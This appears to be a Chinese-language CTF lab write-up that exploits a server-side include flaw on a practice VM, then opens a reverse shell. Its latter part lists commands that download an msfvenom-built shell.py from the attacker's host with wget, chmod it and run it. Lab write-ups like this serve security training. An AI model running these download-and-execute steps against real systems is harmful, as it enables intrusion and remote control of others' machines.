CTF练习:SQL注入之SSI漏洞
CTF练习:SQL注入之SSI漏洞
靶机地址:
链接: https://pan.baidu.com/s/1tKoRIRNhEJzcjGwpNwP-sA
提取码: emfn
环境准备
开启两台机器,一台靶机一台kali攻击机,配置好桥接网络,使其在同一网段内。
查看攻击机kali的IP,为172.19.75.143
查看靶机的IP,为172.19.75.112
ping一下,测试连通性,没问题,开始信息收集。
信息收集
探测靶场开放的端口信息与服务版本
使用dirb对开放的80端口进行进一步挖掘
打开robots链接,发现反爬目录/spukcab,打开这个目录链接,发现两个备份文件,可以下载下来研究。
接着回到终端打开/ssi目录链接,发现很多信息,估计存在ssi漏洞。
再接着回到终端打开/index目录链接,发现了它给出的漏洞利用代码,那我们去寻找注入点。
最后我们打开靶机80端口的主页面,往下拉发现注入点。
将之前找到的示例代码粘进去,submit,发现exec没有出现。
尝试修改大小写,试图绕过。
成功绕过,但是没执行,可能是格式有误,我们加一个!号。
终于成功了。
制作与上传shell
去到桌面,使用msfvenom制作shell.py。
将shell.py移到apache的主目录,即 /var/www/html 下。
开启Apache服务。
开启 metasploit 监听反弹 shell。
run,启动监听。
回到注入网页,下载shell.py文件。
wget http://172.19.75.143/shell.py
给shell.py赋权。
chmod 777 shell.py
执行shell.py文件,返回shell。
python shell.py
回到终端,可以看到shell已经返回回来了。
进入靶机
输入shell,进入终端。
优化终端。
这次靶机主要是相关的sql注入练习,并没有flag值,所以至此完工!!!